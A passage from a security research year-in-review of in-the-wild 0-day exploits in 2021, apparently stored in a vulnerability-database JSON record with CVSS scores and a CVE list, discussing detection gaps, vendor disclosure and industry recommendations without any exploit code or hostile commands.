In 2020 there was [n-day exploitation of Exchange Servers](<https://www.cisa.gov/uscert/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>). Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we\u2019ll likely see it continue into 2022.\n\n# Outstanding Questions\n\nWhile there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we\u2019re missing and why, and the need for more transparency from both vendors and researchers.\n\nUntil the day that attackers decide to happily share all their exploits with us, we can\u2019t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we\u2019re very likely missing. From that, these are some of the key questions we\u2019re asking ourselves as we move into 2022:\n\n## Where are the [x] 0-days?\n\nDespite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there\u2019s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.\n\nAlong with messaging apps, there are other platforms/targets we\u2019d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there\u2019s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.\n\nThis leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?\n\n## Do some vendors have no known in-the-wild 0-days because they\u2019ve never been found or because they don\u2019t publicly disclose?\n\nUnless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don\u2019t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.\n\n## Are we seeing the same bug patterns because that\u2019s what we know how to detect?\n\nAs we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that\u2019s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that\u2019s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we\u2019d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers. \n\n## Where are the spl0itz?\n\nTo successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful). \n\nUnfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.\n\nAs an aside, if you have an exploit sample that you\u2019re willing to share with us, please reach out. Whether it\u2019s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we\u2019d be happy to work with you.\n\n# Conclusion\n\nLooking back on 2021, what comes to mind is \u201cbaby steps\u201d. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we\u2019re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we\u2019ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.\n\nWhile this all may seem daunting, the promising part is that we\u2019ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it\u2019s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress: \n\n\n 1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,\n 2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.\n\nThrough 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted [over](<https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/>) and [over](<https://www.amnesty.org/en/documents/doc10/4491/2021/en/>) how governments were using commercial surveillance products against [journalists](<https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/>), [human rights defenders](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>), and [government officials](<https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/>). We saw many enterprises scrambling to remediate and protect themselves from the [Exchange Server 0-days](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). And we even learned of peer [security researchers being targeted by ](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>)[North Korean government hackers](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>). While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.\n\n2021 showed us we\u2019re on the right track and making progress, but there\u2019s plenty more to be done to make 0-day hard.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "googleprojectzero", "title": "\nThe More You Know, The More You Know You Don\u2019t Know\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4654", "CVE-2019-13720", "CVE-2019-2215", "CVE-2019-6625", "CVE-2020-0688", "CVE-2020-11261", "CVE-2020-16009", "CVE-2020-27932", "CVE-2020-27950", "CVE-2021-0920", "CVE-2021-1048", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30737", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021
